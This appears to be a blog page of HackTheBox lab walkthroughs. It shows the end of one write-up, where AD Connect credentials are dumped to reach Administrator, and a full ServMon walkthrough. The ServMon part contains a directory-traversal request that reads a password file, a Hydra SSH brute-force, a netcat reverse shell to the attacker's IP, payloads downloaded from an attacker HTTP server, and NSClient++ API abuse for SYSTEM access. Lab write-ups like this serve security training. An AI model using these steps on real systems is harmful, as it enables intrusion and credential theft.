-a----        4/19/2020   9:46 PM           1454 AzureAD-Connect.ps1
-a----        4/19/2020  10:42 PM           2264 Azure_meo.ps1
-a----        4/19/2020   9:40 PM           1453 Connect.ps1
-ar---         1/3/2020   5:48 AM             32 user.txt

*Evil-WinRM* PS C:\Users\mhope\Desktop> import-module ./Azure_meo.ps1
*Evil-WinRM* PS C:\Users\mhope\Desktop> Azure_meo
The term 'Azure_meo' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ Azure_meo
+ ~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Azure_meo:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
    
*Evil-WinRM* PS C:\Users\mhope\Desktop> Azure-ADConnect -server 127.0.0.1 -db ADSync
[+] Domain:  MEGABANK.LOCAL
[+] Username: administrator
[+]Password: d0m@in4dminyeah!
*Evil-WinRM* PS C:\Users\mhope\Desktop> exit

┌─[laladee@parrot]─[~/Downloads]
└──╼ $evil-winrm -u Administrator -p d0m@in4dminyeah! -i 10.10.10.172

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
12909612d25c8dcf6e5a07d1a804a0bc
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

Share:
Read More

Apr 19, 2020

HackTheBox Machine Write-up | ServMon Walkthrough

, ,

[ Laladee ~/Downloads ]# nmap -A 10.10.10.184 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-15 10:08 UTC
Nmap scan report for 10.10.10.184
Host is up (0.27s latency).
Not shown: 991 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp   open  http
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|     AuthInfo:
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo: 
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|_    </html>
|_http-title: Site doesn't have a title (text/html).
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5666/tcp open  tcpwrapped
6699/tcp open  napster?
8443/tcp open  tcpwrapped
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.80%I=7%D=4/15%Time=5E96DD61%P=x86_64-unknown-linux-gnu%r
SF:(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r
SF:\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r
SF:\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x20
SF:1\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml
SF:1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999
SF:/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\
SF:x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x2
SF:0\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(HTTPO
SF:ptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\nCon
SF:tent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n\xe
SF:f\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\
SF:x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-tra
SF:nsitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/xhtm
SF:l\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x20<s
SF:cript\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x20w
SF:indow\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\x20
SF:</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(RTSPReques
SF:t,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\nContent-
SF:Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n\xef\xbb
SF:\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\x20Tr
SF:ansitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-transiti
SF:onal\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/xhtml\">\
SF:r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x20<script
SF:\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x20window
SF:\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\x20</scr
SF:ipt>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(FourOhFourReque
SF:st,65,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-type:\x20text/html\r
SF:\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n
SF:");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/15%OT=21%CT=1%CU=33911%PV=Y%DS=2%DC=T%G=Y%TM=5E96DDD
OS:8%P=x86_64-unknown-linux-gnu)SEQ(SP=100%GCD=1%ISR=104%TI=I%CI=I%II=I%SS=
OS:S%TS=U)OPS(O1=M54DNW8NNS%O2=M54DNW8NNS%O3=M54DNW8%O4=M54DNW8NNS%O5=M54DN
OS:W8NNS%O6=M54DNNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN
OS:(R=Y%DF=Y%T=80%W=FFFF%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%
OS:W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
OS:T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A
OS:=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%D
OS:F=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=8
OS:0%CD=Z)

 Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

 Host script results:
|_clock-skew: 2m58s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-04-15T10:13:57
|_  start_date: N/A

 TRACEROUTE (using port 256/tcp)
HOP RTT       ADDRESS
1   266.12 ms 10.10.14.1
2   476.44 ms 10.10.10.184

 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 186.64 seconds

Login to FTP as Anonymous user and download Confidential.txt file

ftp> cd Users
ftp> cd Nadine
ftp> get Confidential.txt

After visiting 10.10.10.184 it showed login page hence searched for NVMS-1000 exploit:
Link : https://www.exploit-db.com/exploits/47774

GET  /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: dataPort=6063
Upgrade-Insecure-Requests: 1

We should remember the contents of Confidential.txt .
 “I left your Passwords.txt file on your Desktop”

GET  /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: dataPort=6063
Upgrade-Insecure-Requests: 1

You will find the hashes:

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

Saved the hashes in a "pass.txt" file and made a one more file with usernames nathan and nadine as "users.txt":

Now use Hydra to find login credentials for SSH. Fire following command:
laladee@parrot:~# hydra -L users.txt -P pass.txt 10.10.10.184 ssh
[22][ssh] host: 10.10.10.184  login: nadine  password: L1k3B1gBut7s@W0rk

Login to SSH:
laladee@parrot:~# ssh nadine@10.10.10.184
nadine@10.10.10.184's password:
Microsoft Windows [Version 10.0.18363.752]         
© 2019 Microsoft Corporation. All rights reserved.
                                                 
nadine@SERVMON C:\Users\Nadine>
Now got to:
nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
GOT FLAG

Time to find NSClient password
C:\"program files"\nsclient++\nsclient.ini
found password: ew2x6SsGTxjRwXOT

According to this configs, we have to call the web page via 127.0.0.1
Now check on which port NSClient service is running:
nadine@SERVMON C:\Program Files\NSClient++>netstat -a
You will find that it's running on port 8443
As we’ve already seen in Nmap results, it needs to a web page with localhost SSL.

Create "meo.bat" file:
@echo off
C:\Temp\nc.exe 10.10.14.32 4444 -e cmd.exe

Start SimpleHTTPServer:
laladee@parrot:~# python -m SimpleHTTPServer 1337
Serving HTTP on 0.0.0.0 port 1337 ...

Download nc.exe and meo.bat file:
nadine@SERVMON C:\>powershell.exe wget "http://10.10.14.32:1337/nc.exe" -outfile "c:\Temp\nc.exe"
nadine@SERVMON C:\>powershell.exe wget "http://10.10.14.32:1337/meo.bat" -outfile "c:\Temp\meo.bat"

Go to terminal and start the listner:
laladee@parrot:~# nc -lvnp 4444
listening on [any] 4444 ...

After reading NSClient++ api and got some hint, we can add and execute our bat file with the following command:

nadine@SERVMON C:\>cd temp
nadine@SERVMON C:\Temp>curl -s -k -u admin -X PUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/meo.bat --data-binary "C:\Temp\nc.exe 10.10.14.32 4444 -e cmd.exe"
nadine@SERVMON C:\Temp>curl -s -k -u admin https://127.0.0.1:8443/api/v1/queries/
type the admin's password that we found:
ew2x6SsGTxjRwXOT

Now check your listner
C:\Program Files\NSClient++>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop>type root.txt

Share:
Read More

About Us

IT